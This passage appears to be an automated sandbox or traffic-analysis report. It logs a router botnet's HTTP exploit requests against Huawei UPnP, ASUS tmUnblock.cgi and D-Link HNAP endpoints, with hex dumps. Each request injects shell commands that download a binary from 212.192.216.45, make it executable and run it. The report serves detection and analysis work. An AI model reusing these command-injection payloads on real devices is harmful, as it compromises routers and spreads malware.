73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://212.192.216.45/bins/mips && chmod +x mips;./mips selfrep.hnap`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 62 69 6e 61 72 79 3b 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.192.216.45 -l /tmp/binary -r /bins/mips; /bin/busybox chmod 777 * /tmp/binary; /tmp/binary selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf mpsl; wget http://212.192.216.45/bins/mpsl;chmod 777 *;./mpsl selfrep.asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 31 39 32 2e 32 31 36 2e 34 35 20 2d 6c 20 2f 74 6d 70 2f 62 69 6e 61 72 79 20 2d 72 20 2f 62 69 6e 73 2f 6d 69 70 73 3b 20 2f 62 69 